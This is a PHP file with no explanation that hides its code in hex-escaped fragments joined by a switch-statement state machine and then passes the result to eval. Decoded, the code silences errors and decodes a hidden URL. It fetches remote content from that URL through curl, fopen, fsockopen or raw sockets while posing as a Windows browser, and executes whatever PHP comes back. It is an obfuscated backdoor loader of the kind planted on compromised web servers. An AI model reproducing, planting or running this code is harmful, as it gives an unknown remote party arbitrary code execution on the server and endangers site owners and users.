<?php
$s=226792; $o=""; while(true) { switch($s) { case 584895: $o.="\x69\x6c\x65\x20\x28\x21\x66\x65"; $s=987594; break;
case 172971: $o.="\x6c\x61\x2f\x35\x2e\x30\x20\x28"; $s=874625; break;
case 967987: $o.="\x27\x3b\x20\x77\x68\x69\x6c\x65"; $s=834953; break;
case 830097: $o.="\x20\x20\x20\x20\x20\x20\x20\x20"; $s=276766; break;
case 640028: $o.="\x75\x66\x20\x2e\x3d\x20\x24\x72"; $s=989239; break;
case 927941: $o.="\x74\x72\x69\x70\x6f\x73\x28\x24"; $s=382146; break;
case 163704: $o.="\x6e\x69\x5f\x67\x65\x74\x28\x27"; $s=984618; break;
case 695926: $o.="\x20\x28\x24\x66\x70\x29\x20\x7b"; $s=871050; break;
case 889217: $o.="\x48\x54\x54\x50\x2f\x31\x2e\x31"; $s=381572; break;
case 371918: $o.="\x0a\x24\x74\x20\x3d\x20\x24\x64"; $s=233638; break;
case 700410: $o.="\x78\x74\x65\x6e\x73\x69\x6f\x6e"; $s=743055; break;
case 672885: $o.="\x73\x65\x2c\x20\x24\x63\x74\x78"; $s=319125; break;
case 314589: $o.="\x74\x5f\x63\x6c\x6f\x73\x65\x28"; $s=776765; break;
case 948973: $o.="\x6f\x6e\x28\x24\x73\x29\x20\x7b"; $s=890062; break;
case 540281: $o.="\x24\x63\x29\x3b\x0d\x0a\x7d"; $s=221028; break;
case 918727: $o.="\x69\x5f\x73\x65\x74\x28\x27\x64"; $s=413269; break;
case 518875: $o.="\x65\x78\x70\x6c\x6f\x64\x65\x28"; $s=816033; break;
case 687793: $o.="\x20\x20\x20\x20\x69\x66\x20\x28"; $s=555190; break;
case 451021: $o.="\x73\x74\x73\x28\x27\x63\x75\x72"; $s=397810; break;
case 882331: $o.="\x0a\x20\x20\x20\x20\x24\x63\x20"; $s=405677; break;
case 919275: $o.="\x21\x24\x63\x20\x26\x26\x20\x69"; $s=163704; break;
case 763435: $o.="\x5d\x29\x3b\x0d\x0a\x20\x20\x20"; $s=304812; break;
case 534815: $o.="\x30\x34\x38\x29\x29\x20\x24\x62"; $s=640028; break;
case 890062: $o.="\x20\x72\x65\x74\x75\x72\x6e\x20"; $s=221579; break;
case 408667: $o.="\x6e\x65\x63\x74\x69\x6f\x6e\x3a"; $s=163548; break;
case 216328: $o.="\x67\x5f\x72\x65\x70\x6c\x61\x63"; $s=208822; break;
case 384927: $o.="\x29\x29\x20\x7b\x0d\x0a\x20\x20"; $s=554254; break;
case 446527: $o.="\x61\x72\x73\x65\x5f\x75\x72\x6c"; $s=921896; break;
case 829417: $o.="\x28\x30\x29\x3b\x20\x40\x69\x6e"; $s=918727; break;
case 756429: $o.="\x20\x20\x24\x63\x74\x78\x20\x3d"; $s=627885; break;
case 267909: $o.="\x70\x65\x6e\x28\x24\x70\x5b\x27"; $s=728662; break;
case 535877: $o.="\x74\x28\x27\x61\x6c\x6c\x6f\x77"; $s=604242; break;
case 249447: $o.="\x75\x74\x27\x3d\x3e\x31\x30\x5d"; $s=763435; break;
case 606133: $o.="\x20\x20\x20\x20\x7d\x0d\x0a\x7d"; $s=186199; break;
case 744154: $o.="\x28\x24\x74\x2c\x20\x27\x72\x27"; $s=869398; break;
case 304812: $o.="\x20\x24\x63\x20\x3d\x20\x40\x66"; $s=309608; break;
case 987441: $o.="\x5f\x54\x43\x50\x29\x3b\x0d\x0a"; $s=687793; break;
case 178426: $o.="\x3d\x3e\x31\x2c\x20\x35\x32\x3d"; $s=931585; break;
case 208822: $o.="\x65\x28\x27\x2f\x5e\x5c\x78\x45"; $s=970296; break;
case 638839: $o.="\x35\x37\x38\x36\x64\x36\x66\x36"; $s=137445; break;
case 521853: $o.="\x53\x4f\x43\x4b\x5f\x53\x54\x52"; $s=741650; break;
case 984618: $o.="\x61\x6c\x6c\x6f\x77\x5f\x75\x72"; $s=400193; break;
case 624485: $o.="\x46\x5f\x49\x4e\x45\x54\x2c\x20"; $s=521853; break;
case 483580: $o.="\x24\x72\x2c\x20\x31\x30\x29\x3b"; $s=336033; break;
case 532701: $o.="\x61\x64\x28\x24\x73\x2c\x20\x32"; $s=534815; break;
case 834953: $o.="\x20\x28\x24\x72\x20\x3d\x20\x73"; $s=957524; break;
case 147245: $o.="\x69\x66\x20\x28\x24\x68\x29\x20"; $s=939274; break;
case 645905: $o.="\x27\x73\x6f\x63\x6b\x65\x74\x73"; $s=456820; break;
case 885364: $o.="\x70\x61\x72\x73\x65\x5f\x75\x72"; $s=314814; break;
case 934704: $o.="\x20\x20\x20\x24\x62\x75\x66\x20"; $s=535756; break;
case 771311: $o.="\x65\x63\x74\x69\x6f\x6e\x3a\x20"; $s=860011; break;
case 242371: $o.="\x2c\x20\x27\x74\x69\x6d\x65\x6f"; $s=249447; break;
case 624416: $o.="\x28\x24\x66\x70\x2c\x20\x22\x47"; $s=609990; break;
case 335640: $o.="\x29\x29\x20\x7b\x0d\x0a\x20\x20"; $s=756429; break;
case 973748: $o.="\x0d\x0a\x20\x20\x20\x20\x7d\x0d"; $s=183037; break;
case 338778: $o.="\x21\x24\x63\x20\x26\x26\x20\x65"; $s=700410; break;
case 593698: $o.="\x72\x5c\x6e\x48\x6f\x73\x74\x3a"; $s=140009; break;
case 371983: $o.="\x65\x70\x6f\x72\x74\x69\x6e\x67"; $s=829417; break;
case 935598: $o.="\x20\x20\x66\x77\x72\x69\x74\x65"; $s=624416; break;
case 869398: $o.="\x29\x3b\x0d\x0a\x20\x20\x20\x20"; $s=147245; break;
case 907505: $o.="\x5c\x6e\x5c\x72\x5c\x6e\x22\x29"; $s=992987; break;
case 600709: $o.="\x28\x27\x3f\x3e\x27\x20\x2e\x20"; $s=540281; break;
case 776859: $o.="\x38\x36\x27\x29\x3b\x0d\x0a\x24"; $s=833901; break;
case 869177: $o.="\x20\x66\x67\x65\x74\x73\x28\x24"; $s=883237; break;
case 743055: $o.="\x5f\x6c\x6f\x61\x64\x65\x64\x28"; $s=645905; break;
case 794315: $o.="\x3d\x20\x27\x4d\x6f\x7a\x69\x6c"; $s=172971; break;
case 132507: $o.="\x29\x20\x7b\x0d\x0a\x20\x20\x20"; $s=153251; break;
case 407406: $o.="\x2c\x20\x24\x72\x65\x71\x2c\x20"; $s=162026; break;
case 514885: $o.="\x24\x63\x20\x3d\x20\x24\x61\x72"; $s=554195; break;
case 293911: $o.="\x63\x72\x65\x61\x74\x65\x28\x41"; $s=624485; break;
case 226171: $o.="\x63\x72\x65\x61\x74\x65\x28\x5b"; $s=771574; break;
case 913127: $o.="\x0a\x69\x66\x20\x28\x24\x63\x29"; $s=667665; break;
case 955858: $o.="\x2d\x41\x67\x65\x6e\x74\x3a\x20"; $s=153543; break;
case 276766: $o.="\x24\x62\x75\x66\x20\x3d\x20\x27"; $s=967987; break;
case 309608: $o.="\x69\x6c\x65\x5f\x67\x65\x74\x5f"; $s=119361; break;
case 458020: $o.="\x29\x3b\x0d\x0a\x20\x20\x20\x20"; $s=407324; break;
case 217312: $o.="\x4e\x54\x20\x31\x30\x2e\x30\x3b"; $s=282995; break;
case 314814: $o.="\x6c\x28\x24\x74\x29\x3b\x0d\x0a"; $s=101929; break;
case 911096: $o.="\x20\x73\x6f\x63\x6b\x65\x74\x5f"; $s=293911; break;
case 304322: $o.="\x75\x72\x6c\x5f\x69\x6e\x69\x74"; $s=377591; break;
case 205462: $o.="\x24\x63\x20\x3d\x20\x70\x72\x65"; $s=216328; break;
case 106437: $o.="\x73\x65\x74\x6f\x70\x74\x5f\x61"; $s=562317; break;
case 290450: $o.="\x72\x72\x20\x3d\x20\x65\x78\x70"; $s=952198; break;
case 377591: $o.="\x28\x24\x74\x29\x3b\x0d\x0a\x20"; $s=232525; break;
case 189235: $o.="\x20\x20\x20\x69\x66\x20\x28\x73"; $s=927941; break;
case 284103: $o.="\x20\x21\x3d\x3d\x20\x66\x61\x6c"; $s=765613; break;
case 661992: $o.="\x0a\x7d\x0d\x0a\x69\x66\x20\x28"; $s=919275; break;
case 984930: $o.="\x67\x65\x6e\x74\x3a\x20\x24\x75"; $s=441633; break;
case 441633: $o.="\x61\x5c\x72\x5c\x6e\x43\x6f\x6e"; $s=408667; break;
case 226792: $o.="\x40\x65\x72\x72\x6f\x72\x5f\x72"; $s=371983; break;
case 101929: $o.="\x20\x20\x20\x20\x24\x73\x20\x3d"; $s=911096; break;
case 413269: $o.="\x69\x73\x70\x6c\x61\x79\x5f\x65"; $s=932236; break;
case 756526: $o.="\x65\x6e\x74\x73\x28\x24\x68\x29"; $s=386524; break;
case 407324: $o.="\x20\x20\x20\x20\x69\x66\x20\x28"; $s=687661; break;
case 217596: $o.="\x3d\x20\x40\x66\x6f\x70\x65\x6e"; $s=744154; break;
case 815464: $o.="\x20\x20\x20\x20\x20\x20\x24\x61"; $s=290450; break;
case 382146: $o.="\x63\x2c\x20\x27\x3c\x3f\x27\x29"; $s=284103; break;
case 724034: $o.="\x66\x20\x28\x21\x24\x63\x20\x26"; $s=945839; break;
case 920157: $o.="\x27\x3d\x3e\x22\x55\x73\x65\x72"; $s=955858; break;
case 833901: $o.="\x63\x20\x3d\x20\x66\x61\x6c\x73"; $s=534168; break;
case 186199: $o.="\x0d\x0a\x69\x66\x20\x28\x21\x24"; $s=540003; break;
case 851266: $o.="\x5c\x72\x5c\x6e\x43\x6f\x6e\x6e"; $s=771311; break;
case 624924: $o.="\x38\x30\x2c\x20\x24\x65\x2c\x20"; $s=483580; break;
case 835473: $o.="\x6e\x6e\x65\x63\x74\x28\x24\x73"; $s=287011; break;
case 534168: $o.="\x65\x3b\x0d\x0a\x24\x75\x61\x20"; $s=794315; break;
case 203164: $o.="\x33\x37\x66\x32\x66\x32\x61\x33"; $s=402958; break;
case 970296: $o.="\x46\x5c\x78\x42\x42\x5c\x78\x42"; $s=758033; break;
case 282995: $o.="\x20\x57\x69\x6e\x36\x34\x3b\x20"; $s=540746; break;
case 955884: $o.="\x20\x20\x20\x24\x70\x20\x3d\x20"; $s=885364; break;
case 765613: $o.="\x73\x65\x29\x20\x65\x76\x61\x6c"; $s=600709; break;
case 732584: $o.="\x20\x20\x20\x24\x63\x20\x3d\x20"; $s=927480; break;
case 279012: $o.="\x54\x54\x50\x2f\x31\x2e\x31\x5c"; $s=593698; break;
case 626544: $o.="\x63\x6f\x6e\x74\x65\x78\x74\x5f"; $s=226171; break;
case 871050: $o.="\x0d\x0a\x20\x20\x20\x20\x20\x20"; $s=935598; break;
case 667665: $o.="\x20\x7b\x0d\x0a\x20\x20\x20\x20"; $s=205462; break;
case 554254: $o.="\x20\x20\x20\x20\x20\x20\x24\x72"; $s=979602; break;
case 137445: $o.="\x64\x36\x30\x37\x35\x36\x34\x37"; $s=203164; break;
case 300479: $o.="\x20\x73\x6f\x63\x6b\x65\x74\x5f"; $s=470072; break;
case 957524: $o.="\x6f\x63\x6b\x65\x74\x5f\x72\x65"; $s=532701; break;
case 445291: $o.="\x28\x24\x74\x2c\x20\x66\x61\x6c"; $s=672885; break;
case 120073: $o.="\x61\x74\x68\x27\x5d\x7d\x20\x48"; $s=279012; break;
case 153251: $o.="\x20\x24\x63\x68\x20\x3d\x20\x63"; $s=304322; break;
case 931585: $o.="\x3e\x31\x2c\x20\x31\x30\x30\x31"; $s=981239; break;
case 119361: $o.="\x63\x6f\x6e\x74\x65\x6e\x74\x73"; $s=445291; break;
case 248609: $o.="\x73\x29\x29\x3b\x20\x7d\x3b\x0d"; $s=371918; break;
case 547594: $o.="\x75\x72\x6c\x5f\x63\x6c\x6f\x73"; $s=692991; break;
case 631982: $o.="\x72\x65\x71\x29\x29\x3b\x0d\x0a"; $s=830097; break;
case 555190: $o.="\x24\x73\x20\x26\x26\x20\x40\x73"; $s=951983; break;
case 996894: $o.="\x5c\x6e\x5c\x72\x5c\x6e\x22\x2c"; $s=873839; break;
case 319125: $o.="\x29\x3b\x0d\x0a\x7d\x0d\x0a\x69"; $s=724034; break;
case 168115: $o.="\x29\x29\x20\x24\x63\x20\x3d\x20"; $s=350770; break;
case 776765: $o.="\x24\x73\x29\x3b\x0d\x0a\x20\x20"; $s=815464; break;
case 158455: $o.="\x31\x33\x3d\x3e\x31\x30\x2c\x20"; $s=258498; break;
case 206848: $o.="\x69\x66\x20\x28\x66\x75\x6e\x63"; $s=196539; break;
case 901802: $o.="\x72\x72\x5b\x31\x5d\x29\x29\x20"; $s=514885; break;
case 124514: $o.="\x20\x20\x20\x24\x66\x70\x20\x3d"; $s=242143; break;
case 221579: $o.="\x68\x65\x78\x32\x62\x69\x6e\x28"; $s=228094; break;
case 386524: $o.="\x3b\x0d\x0a\x20\x20\x20\x20\x20"; $s=799047; break;
case 402958: $o.="\x33\x37\x30\x37\x34\x37\x34\x37"; $s=776859; break;
case 819727: $o.="\x67\x65\x74\x5f\x63\x6f\x6e\x74"; $s=756526; break;
case 627885: $o.="\x20\x73\x74\x72\x65\x61\x6d\x5f"; $s=626544; break;
case 221028: eval($o); break 2;
case 405677: $o.="\x3d\x20\x63\x75\x72\x6c\x5f\x65"; $s=116920; break;
case 162324: $o.="\x32\x3d\x3e\x30\x5d\x29\x3b\x0d"; $s=882331; break;
case 816033: $o.="\x22\x5c\x72\x5c\x6e\x5c\x72\x5c"; $s=985436; break;
case 939274: $o.="\x7b\x0d\x0a\x20\x20\x20\x20\x20"; $s=732584; break;
case 242143: $o.="\x20\x40\x66\x73\x6f\x63\x6b\x6f"; $s=267909; break;
case 369745: $o.="\x2c\x20\x5b\x31\x39\x39\x31\x33"; $s=178426; break;
case 927480: $o.="\x40\x73\x74\x72\x65\x61\x6d\x5f"; $s=819727; break;
case 217557: $o.="\x20\x24\x63\x29\x3b\x0d\x0a\x20"; $s=189235; break;
case 697802: $o.="\x3a\x20\x7b\x24\x70\x5b\x27\x68"; $s=442237; break;
case 979602: $o.="\x65\x71\x20\x3d\x20\x22\x47\x45"; $s=678761; break;
case 874625: $o.="\x57\x69\x6e\x64\x6f\x77\x73\x20"; $s=217312; break;
case 603552: $o.="\x0a\x20\x20\x20\x20\x24\x68\x20"; $s=217596; break;
case 258498: $o.="\x36\x34\x3d\x3e\x30\x2c\x20\x34"; $s=162324; break;
case 728662: $o.="\x68\x6f\x73\x74\x27\x5d\x2c\x20"; $s=624924; break;
case 804410: $o.="\x6e\x55\x73\x65\x72\x2d\x41\x67"; $s=802512; break;
case 228094: $o.="\x73\x74\x72\x72\x65\x76\x28\x24"; $s=248609; break;
case 210719: $o.="\x73\x74\x27\x5d\x2c\x20\x38\x30"; $s=384927; break;
case 677623: $o.="\x20\x20\x20\x7d\x0d\x0a\x7d\x0d"; $s=913127; break;
case 362242: $o.="\x65\x6e\x27\x29\x29\x20\x7b\x0d"; $s=603552; break;
case 442237: $o.="\x6f\x73\x74\x27\x5d\x7d\x5c\x72"; $s=175645; break;
case 951983: $o.="\x6f\x63\x6b\x65\x74\x5f\x63\x6f"; $s=835473; break;
case 663905: $o.="\x3b\x0d\x0a\x20\x20\x20\x20\x20"; $s=321733; break;
case 741650: $o.="\x45\x41\x4d\x2c\x20\x53\x4f\x4c"; $s=987441; break;
case 570014: $o.="\x6e\x5c\x72\x5c\x6e\x22\x3b\x0d"; $s=379305; break;
case 945839: $o.="\x26\x20\x69\x6e\x69\x5f\x67\x65"; $s=535877; break;
case 321733: $o.="\x20\x20\x20\x66\x63\x6c\x6f\x73"; $s=779982; break;
case 562317: $o.="\x72\x72\x61\x79\x28\x24\x63\x68"; $s=369745; break;
case 992987: $o.="\x3b\x0d\x0a\x20\x20\x20\x20\x20"; $s=934704; break;
case 394811: $o.="\x20\x24\x62\x75\x66\x20\x2e\x3d"; $s=869177; break;
case 810587: $o.="\x5b\x27\x68\x65\x61\x64\x65\x72"; $s=920157; break;
case 232525: $o.="\x20\x20\x20\x63\x75\x72\x6c\x5f"; $s=106437; break;
case 554195: $o.="\x72\x5b\x31\x5d\x3b\x0d\x0a\x20"; $s=677623; break;
case 397810: $o.="\x6c\x5f\x69\x6e\x69\x74\x27\x29"; $s=132507; break;
case 687661: $o.="\x69\x73\x73\x65\x74\x28\x24\x61"; $s=901802; break;
case 802512: $o.="\x65\x6e\x74\x3a\x20\x24\x75\x61"; $s=851266; break;
case 350770: $o.="\x24\x61\x72\x72\x5b\x31\x5d\x3b"; $s=973748; break;
case 163548: $o.="\x20\x43\x6c\x6f\x73\x65\x5c\x72"; $s=907505; break;
case 336033: $o.="\x0d\x0a\x20\x20\x20\x20\x69\x66"; $s=695926; break;
case 540746: $o.="\x78\x36\x34\x29\x27\x3b\x0d\x0a"; $s=206848; break;
case 977955: $o.="\x2c\x20\x32\x29\x3b\x0d\x0a\x20"; $s=622547; break;
case 771574: $o.="\x27\x68\x74\x74\x70\x27\x3d\x3e"; $s=810587; break;
case 873839: $o.="\x20\x24\x62\x75\x66\x2c\x20\x32"; $s=458020; break;
case 233638: $o.="\x28\x27\x34\x37\x38\x37\x34\x37"; $s=875547; break;
case 162026: $o.="\x73\x74\x72\x6c\x65\x6e\x28\x24"; $s=631982; break;
case 981239: $o.="\x38\x3d\x3e\x24\x75\x61\x2c\x20"; $s=158455; break;
case 116920: $o.="\x78\x65\x63\x28\x24\x63\x68\x29"; $s=348632; break;
case 758033: $o.="\x46\x2f\x27\x2c\x20\x27\x27\x2c"; $s=217557; break;
case 540003: $o.="\x63\x29\x20\x7b\x0d\x0a\x20\x20"; $s=597287; break;
case 609990: $o.="\x45\x54\x20\x7b\x24\x70\x5b\x27"; $s=757999; break;
case 604242: $o.="\x5f\x75\x72\x6c\x5f\x66\x6f\x70"; $s=362242; break;
case 875547: $o.="\x65\x32\x33\x33\x66\x32\x64\x36"; $s=292825; break;
case 744029: $o.="\x3d\x20\x66\x75\x6e\x63\x74\x69"; $s=948973; break;
case 562474: $o.="\x73\x74\x27\x5d\x7d\x5c\x72\x5c"; $s=804410; break;
case 470072: $o.="\x77\x72\x69\x74\x65\x28\x24\x73"; $s=407406; break;
case 292825: $o.="\x66\x36\x33\x36\x65\x32\x32\x36"; $s=638839; break;
case 400193: $o.="\x6c\x5f\x66\x6f\x70\x65\x6e\x27"; $s=335640; break;
case 183037: $o.="\x0a\x7d\x0d\x0a\x69\x66\x20\x28"; $s=338778; break;
case 860011: $o.="\x43\x6c\x6f\x73\x65\x5c\x72\x5c"; $s=570014; break;
case 348632: $o.="\x3b\x0d\x0a\x20\x20\x20\x20\x63"; $s=547594; break;
case 779982: $o.="\x65\x28\x24\x66\x70\x29\x3b\x0d"; $s=775540; break;
case 985436: $o.="\x6e\x22\x2c\x20\x24\x62\x75\x66"; $s=977955; break;
case 153543: $o.="\x24\x75\x61\x5c\x72\x5c\x6e\x22"; $s=242371; break;
case 287011: $o.="\x2c\x20\x24\x70\x5b\x27\x68\x6f"; $s=210719; break;
case 883237: $o.="\x66\x70\x2c\x20\x31\x32\x38\x29"; $s=663905; break;
case 678761: $o.="\x54\x20\x7b\x24\x70\x5b\x27\x70"; $s=120073; break;
case 987594: $o.="\x6f\x66\x28\x24\x66\x70\x29\x29"; $s=394811; break;
case 381572: $o.="\x5c\x72\x5c\x6e\x48\x6f\x73\x74"; $s=697802; break;
case 175645: $o.="\x5c\x6e\x55\x73\x65\x72\x2d\x41"; $s=984930; break;
case 535756: $o.="\x3d\x20\x27\x27\x3b\x20\x77\x68"; $s=584895; break;
case 952198: $o.="\x6c\x6f\x64\x65\x28\x22\x5c\x72"; $s=996894; break;
case 689986: $o.="\x28\x24\x61\x72\x72\x5b\x31\x5d"; $s=168115; break;
case 196539: $o.="\x74\x69\x6f\x6e\x5f\x65\x78\x69"; $s=451021; break;
case 358109: $o.="\x20\x20\x20\x73\x6f\x63\x6b\x65"; $s=314589; break;
case 657177: $o.="\x30\x29\x3b\x0d\x0a\x24\x64\x20"; $s=744029; break;
case 989239: $o.="\x3b\x0d\x0a\x20\x20\x20\x20\x20"; $s=358109; break;
case 692991: $o.="\x65\x28\x24\x63\x68\x29\x3b\x0d"; $s=661992; break;
case 757999: $o.="\x70\x61\x74\x68\x27\x5d\x7d\x20"; $s=889217; break;
case 582766: $o.="\x65\x28\x24\x68\x29\x3b\x0d\x0a"; $s=606133; break;
case 457741: $o.="\x66\x20\x28\x69\x73\x73\x65\x74"; $s=689986; break;
case 799047: $o.="\x20\x20\x20\x66\x63\x6c\x6f\x73"; $s=582766; break;
case 932236: $o.="\x72\x72\x6f\x72\x73\x27\x2c\x20"; $s=657177; break;
case 921896: $o.="\x28\x24\x74\x29\x3b\x0d\x0a\x20"; $s=124514; break;
case 456820: $o.="\x27\x29\x29\x20\x7b\x0d\x0a\x20"; $s=955884; break;
case 597287: $o.="\x20\x20\x24\x70\x20\x3d\x20\x70"; $s=446527; break;
case 622547: $o.="\x20\x20\x20\x20\x20\x20\x20\x69"; $s=457741; break;
case 166706: $o.="\x20\x24\x61\x72\x72\x20\x3d\x20"; $s=518875; break;
case 775540: $o.="\x0a\x20\x20\x20\x20\x20\x20\x20"; $s=166706; break;
case 140009: $o.="\x20\x7b\x24\x70\x5b\x27\x68\x6f"; $s=562474; break;
case 379305: $o.="\x0a\x20\x20\x20\x20\x20\x20\x20"; $s=300479; break; } }
?>
